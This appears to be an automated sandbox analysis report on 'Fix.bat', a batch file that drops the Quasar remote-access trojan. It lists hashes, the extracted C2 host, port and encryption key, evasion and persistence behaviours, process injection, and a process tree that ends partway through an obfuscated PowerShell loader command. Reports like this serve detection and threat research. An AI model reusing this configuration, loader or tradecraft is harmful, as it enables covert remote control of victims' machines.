Analysis
-
max time kernel
300s -
max time network
208s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
12-05-2024 19:02
Static task
static1
Behavioral task
behavioral1
Sample
Fix.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Fix.bat
Resource
win10v2004-20240508-en
General
-
Target
Fix.bat
-
Size
621B
-
MD5
e235e723f57a72ef725306c3e14d4726
-
SHA1
9b2153053f8e89c300e32da5df32e9b990594aac
-
SHA256
aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67
-
SHA512
0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e
Malware Config
Extracted
quasar
3.1.5
RPad
even-lemon.gl.at.ply.gg:33587
$Sxr-okPqrmZ8kNVUcS4Rp0
-
encryption_key
XmcBnPuLlN1e8SHIRR1z
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BoostBot.exe family_quasar behavioral2/memory/2604-27-0x00000000004C0000-0x000000000052C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEdescription pid process target process PID 1592 created 612 1592 powershell.EXE winlogon.exe PID 4668 created 612 4668 powershell.EXE winlogon.exe PID 4472 created 612 4472 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-powershell.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation $sxr-powershell.exe -
Executes dropped EXE 5 IoCs
Processes:
BoostBot.exe$sxr-powershell.exeinstall.exeinstall.exeinstall.exepid process 2604 BoostBot.exe 4568 $sxr-powershell.exe 3448 install.exe 840 install.exe 4912 install.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 16 raw.githubusercontent.com 22 raw.githubusercontent.com 15 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 ip-api.com -
Drops file in System32 directory 13 IoCs
Processes:
svchost.exepowershell.EXEpowershell.EXEsvchost.exesvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\System32\Tasks\$77$sxr-powershell.exe svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEdescription pid process target process PID 1592 set thread context of 3368 1592 powershell.EXE dllhost.exe PID 4668 set thread context of 220 4668 powershell.EXE dllhost.exe PID 4472 set thread context of 2216 4472 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exeSCHTASKS.exepid process 3056 schtasks.exe 2912 SCHTASKS.exe 4924 schtasks.exe 2456 SCHTASKS.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715540666" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe$sxr-powershell.exepid process 4956 powershell.exe 4956 powershell.exe 1592 powershell.EXE 1592 powershell.EXE 4668 powershell.EXE 4668 powershell.EXE 1592 powershell.EXE 3368 dllhost.exe 3368 dllhost.exe 3368 dllhost.exe 3368 dllhost.exe 4668 powershell.EXE 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 4568 $sxr-powershell.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe 220 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEpowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 4956 powershell.exe Token: SeDebugPrivilege 2604 BoostBot.exe Token: SeDebugPrivilege 4568 $sxr-powershell.exe Token: SeDebugPrivilege 1592 powershell.EXE Token: SeDebugPrivilege 4668 powershell.EXE Token: SeDebugPrivilege 1592 powershell.EXE Token: SeDebugPrivilege 3368 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2316 svchost.exe Token: SeIncreaseQuotaPrivilege 2316 svchost.exe Token: SeSecurityPrivilege 2316 svchost.exe Token: SeTakeOwnershipPrivilege 2316 svchost.exe Token: SeLoadDriverPrivilege 2316 svchost.exe Token: SeSystemtimePrivilege 2316 svchost.exe Token: SeBackupPrivilege 2316 svchost.exe Token: SeRestorePrivilege 2316 svchost.exe Token: SeShutdownPrivilege 2316 svchost.exe Token: SeSystemEnvironmentPrivilege 2316 svchost.exe Token: SeUndockPrivilege 2316 svchost.exe Token: SeManageVolumePrivilege 2316 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2316 svchost.exe Token: SeIncreaseQuotaPrivilege 2316 svchost.exe Token: SeSecurityPrivilege 2316 svchost.exe Token: SeTakeOwnershipPrivilege 2316 svchost.exe Token: SeLoadDriverPrivilege 2316 svchost.exe Token: SeSystemtimePrivilege 2316 svchost.exe Token: SeBackupPrivilege 2316 svchost.exe Token: SeRestorePrivilege 2316 svchost.exe Token: SeShutdownPrivilege 2316 svchost.exe Token: SeSystemEnvironmentPrivilege 2316 svchost.exe Token: SeUndockPrivilege 2316 svchost.exe Token: SeManageVolumePrivilege 2316 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2316 svchost.exe Token: SeIncreaseQuotaPrivilege 2316 svchost.exe Token: SeSecurityPrivilege 2316 svchost.exe Token: SeTakeOwnershipPrivilege 2316 svchost.exe Token: SeLoadDriverPrivilege 2316 svchost.exe Token: SeSystemtimePrivilege 2316 svchost.exe Token: SeBackupPrivilege 2316 svchost.exe Token: SeRestorePrivilege 2316 svchost.exe Token: SeShutdownPrivilege 2316 svchost.exe Token: SeSystemEnvironmentPrivilege 2316 svchost.exe Token: SeUndockPrivilege 2316 svchost.exe Token: SeManageVolumePrivilege 2316 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2316 svchost.exe Token: SeIncreaseQuotaPrivilege 2316 svchost.exe Token: SeSecurityPrivilege 2316 svchost.exe Token: SeTakeOwnershipPrivilege 2316 svchost.exe Token: SeLoadDriverPrivilege 2316 svchost.exe Token: SeSystemtimePrivilege 2316 svchost.exe Token: SeBackupPrivilege 2316 svchost.exe Token: SeRestorePrivilege 2316 svchost.exe Token: SeShutdownPrivilege 2316 svchost.exe Token: SeSystemEnvironmentPrivilege 2316 svchost.exe Token: SeUndockPrivilege 2316 svchost.exe Token: SeManageVolumePrivilege 2316 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2316 svchost.exe Token: SeIncreaseQuotaPrivilege 2316 svchost.exe Token: SeSecurityPrivilege 2316 svchost.exe Token: SeTakeOwnershipPrivilege 2316 svchost.exe Token: SeLoadDriverPrivilege 2316 svchost.exe Token: SeSystemtimePrivilege 2316 svchost.exe Token: SeBackupPrivilege 2316 svchost.exe Token: SeRestorePrivilege 2316 svchost.exe Token: SeShutdownPrivilege 2316 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
$sxr-powershell.exeConhost.exepid process 4568 $sxr-powershell.exe 4620 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 2488 wrote to memory of 2576 2488 cmd.exe certutil.exe PID 2488 wrote to memory of 2576 2488 cmd.exe certutil.exe PID 2488 wrote to memory of 4956 2488 cmd.exe powershell.exe PID 2488 wrote to memory of 4956 2488 cmd.exe powershell.exe PID 4956 wrote to memory of 2604 4956 powershell.exe BoostBot.exe PID 4956 wrote to memory of 2604 4956 powershell.exe BoostBot.exe PID 4956 wrote to memory of 2604 4956 powershell.exe BoostBot.exe PID 2488 wrote to memory of 2588 2488 cmd.exe icacls.exe PID 2488 wrote to memory of 2588 2488 cmd.exe icacls.exe PID 2488 wrote to memory of 4196 2488 cmd.exe reg.exe PID 2488 wrote to memory of 4196 2488 cmd.exe reg.exe PID 2488 wrote to memory of 1060 2488 cmd.exe attrib.exe PID 2488 wrote to memory of 1060 2488 cmd.exe attrib.exe PID 2604 wrote to memory of 4924 2604 BoostBot.exe schtasks.exe PID 2604 wrote to memory of 4924 2604 BoostBot.exe schtasks.exe PID 2604 wrote to memory of 4924 2604 BoostBot.exe schtasks.exe PID 2604 wrote to memory of 4568 2604 BoostBot.exe $sxr-powershell.exe PID 2604 wrote to memory of 4568 2604 BoostBot.exe $sxr-powershell.exe PID 2604 wrote to memory of 4568 2604 BoostBot.exe $sxr-powershell.exe PID 2604 wrote to memory of 3448 2604 BoostBot.exe install.exe PID 2604 wrote to memory of 3448 2604 BoostBot.exe install.exe PID 2604 wrote to memory of 3448 2604 BoostBot.exe install.exe PID 2604 wrote to memory of 2456 2604 BoostBot.exe SCHTASKS.exe PID 2604 wrote to memory of 2456 2604 BoostBot.exe SCHTASKS.exe PID 2604 wrote to memory of 2456 2604 BoostBot.exe SCHTASKS.exe PID 4568 wrote to memory of 3056 4568 $sxr-powershell.exe schtasks.exe PID 4568 wrote to memory of 3056 4568 $sxr-powershell.exe schtasks.exe PID 4568 wrote to memory of 3056 4568 $sxr-powershell.exe schtasks.exe PID 4568 wrote to memory of 840 4568 $sxr-powershell.exe install.exe PID 4568 wrote to memory of 840 4568 $sxr-powershell.exe install.exe PID 4568 wrote to memory of 840 4568 $sxr-powershell.exe install.exe PID 1592 wrote to memory of 3368 1592 powershell.EXE dllhost.exe PID 1592 wrote to memory of 3368 1592 powershell.EXE dllhost.exe PID 1592 wrote to memory of 3368 1592 powershell.EXE dllhost.exe PID 1592 wrote to memory of 3368 1592 powershell.EXE dllhost.exe PID 1592 wrote to memory of 3368 1592 powershell.EXE dllhost.exe PID 1592 wrote to memory of 3368 1592 powershell.EXE dllhost.exe PID 1592 wrote to memory of 3368 1592 powershell.EXE dllhost.exe PID 1592 wrote to memory of 3368 1592 powershell.EXE dllhost.exe PID 3368 wrote to memory of 612 3368 dllhost.exe winlogon.exe PID 3368 wrote to memory of 672 3368 dllhost.exe lsass.exe PID 3368 wrote to memory of 952 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 336 3368 dllhost.exe dwm.exe PID 3368 wrote to memory of 416 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 656 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 868 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1040 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1088 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1200 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1216 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1356 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1368 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1384 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1392 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1400 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1556 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1580 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1644 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1700 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1788 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1884 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1904 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1912 3368 dllhost.exe svchost.exe PID 3368 wrote to memory of 1956 3368 dllhost.exe svchost.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6b98a3ba-0d63-4db8-9e82-cfbfc2d04a29}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4f57131d-acf6-435e-87cc-dc93f44808b6}2⤵
- Suspicious behavior: EnumeratesProcesses
PID:220 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e2e4e52d-949c-4bf7-9b33-b012809df131}2⤵PID:2216
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1088 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZzqpaqcSBnrT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qMRvYQxVScxnqX,[Parameter(Position=1)][Type]$DbEqhkFLNK)$nsNpTltMhLn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 